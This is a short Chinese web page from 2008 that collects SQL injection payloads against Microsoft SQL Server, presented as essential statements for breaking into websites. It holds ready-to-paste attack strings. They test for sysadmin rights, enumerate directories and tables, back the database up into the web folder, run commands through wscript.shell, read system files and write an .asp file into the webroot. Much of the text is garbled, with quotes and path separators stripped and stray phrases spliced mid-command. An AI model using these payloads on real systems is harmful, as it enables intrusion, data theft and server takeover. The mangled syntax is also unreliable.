入侵网站必备Sql语句:(经典语句)
2008-10-27 16:51:14 来源:WEB开发网;insert into temp(id,num1)
exec master.dbo.xp_dirtree c:;-- (xp_dirtree适用权限PUBLIC)
写入表:
语句1:and 1= (SELECT IS_SRVROLEMEMBER(sysadmin));--
语句2:and 1=(SELECT IS_SRVROLEMEMBER (serveradmin));--
语句3:and
1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
语句4:and 1=(SELECT
IS_SRVROLEMEMBER(securityadmin));--
语句5:and 1=(SELECT
IS_SRVROLEMEMBER (securityadmin));--
语句6:and 1=(SELECT
IS_SRVROLEMEMBER(diskadmin));--
语句7:and 1= (SELECT
IS_SRVROLEMEMBER(bulkadmin));--
语句8:and 1=(SELECT
IS_SRVROLEMEMBER (bulkadmin));--
语句9:and 1=(SELECT
IS_MEMBER(db_owner));--
把路径写到表中去:
;create table
dirs(paths varchar(100), id int)--
;insert dirs exec
master.dbo.xp_dirtree c:--
and 0(select top 1 paths from
dirs)--
and 0 (select top 1 paths from dirs where paths not
in(@Inetpub))--
;create table dirs1(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree e:web--
and
0(select top 1 paths from dirs1)--
把数据库备份到网页目录:下载
;declare @a sysname; set @a=db_name();backup database @a to返回的信息有两个字段
disk=e:webdown.bak;--
and 1=(Select top 1 name from(Select top 12
id,name from sysobjects where xtype=char(85)) T order by id desc)
and
1=(Select Top 1 col_name(object_id(USER_LOGIN),1)
from sysobjects) 参看相关表。
and 1=(select user_id from
USER_LOGIN)
and 0=(select user from USER_LOGIN where
user>1)
-=- wscript.shell example -=-
declare @o int
exec
sp_oacreate wscript.shell, @o out
exec sp_oamethod @o,
run, NULL, notepad.exe
; declare @o int exec sp_oacreate
wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate scripting.filesystemobject, @o out
exec
sp_oamethod @o, opentextfile, @f out, c:boot.ini, 1
exec @ret =
sp_oamethod @f, readline, @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, readline, @line out
end
declare @o int, @f int, @t int, @ret int
exec
sp_oacreate scripting.filesystemobject, @o out
exec
sp_oamethod @o, createtextfile, @f out, c:inetpubwwwrootfoo.asp, 1
exec @ret = sp_oamethod @f, writeline, NULL,
declare @o int, @ret int
exec sp_oacreate
speech.voicetext, @o out
exec sp _oamethod @o, register, NULL,
foo, bar
exec sp_oasetproperty @o, speed, 150
exec
sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us,
528
waitfor delay 00:00:05
; declare @o int, @ret int exec
sp_oacreate speech.voicetext, @o out exec sp_oamethod @o,
register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec
sp_oamethod @o, speak, NULL, all your sequel servers are belong to us,
528 waitfor delay 00:00:05--
xp_dirtree适用权限PUBLIC
exec
master.dbo.xp_dirtree c:
subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。
create table dirs(paths
varchar(100), id int)
建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。
insert dirs exec master.dbo.xp_dirtree c:
只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,
一步步达到我们想要的信息!
中查找“入侵网站必备Sql语句:(经典语句)”更多相关内容
中查找“入侵网站必备Sql语句:(经典语句)”更多相关内容更多精彩
赞助商链接
